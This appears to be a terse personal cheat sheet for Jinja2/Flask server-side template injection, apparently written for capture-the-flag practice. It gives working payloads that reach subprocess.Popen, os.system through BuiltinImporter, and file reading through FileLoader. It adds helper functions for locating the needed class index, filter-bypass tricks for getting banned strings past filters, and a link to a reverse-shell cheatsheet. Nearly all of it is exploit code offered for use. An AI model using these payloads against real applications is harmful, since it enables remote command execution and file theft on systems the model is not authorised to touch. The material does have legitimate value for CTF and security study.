Flask

List classes: {{ "".__class__.__base__.__subclasses__() }}

Get subprocess.Popopen:

def get_popopen(string):
	i = string.index("<class 'subprocess.Popen'>")
	s = string[:i]
	return s.count(",")

Execute commands: {{ "".__class__.__base__.__subclasses__()[<n>]([<cmd>], stdout=-1).communicate() }}

Alternative: frozenimportlib

Get _frozen_importlib.BuiltinImporter:

def get_builtinimporter(string):
	i = string.index("<class '_frozen_importlib.BuiltinImporter'>")
	s = string[:i]
	return s.count(",")

Execute commands: {{ "".__class__.__base__.__subclasses__()[<n>]().load_module("os").system(<cmd>) }}

Get _frozen_importlib_external.FileLoader:

def get_fileloader(string):
	i = string.index("<class '_frozen_importlib_external.FileLoader'>")
	s = string[:i]
	return s.count(",")

{{ "".__class__.__base__.__subclasses__()[<n>].get_data(0,<file>) }}

Useful filters and tricks (should be available in default jinja/flask app):

dict(string=x)|first == 'string': Get strings without using quotes
'galf'|reverse: Get banned strings
True = 1, False = 0
lipsum[dict(__globals__=x)|first] = globals(): Can possibly get os module from here
{*open('flag')}: Read files without read

Session cracking

[PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings (github.com)](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python)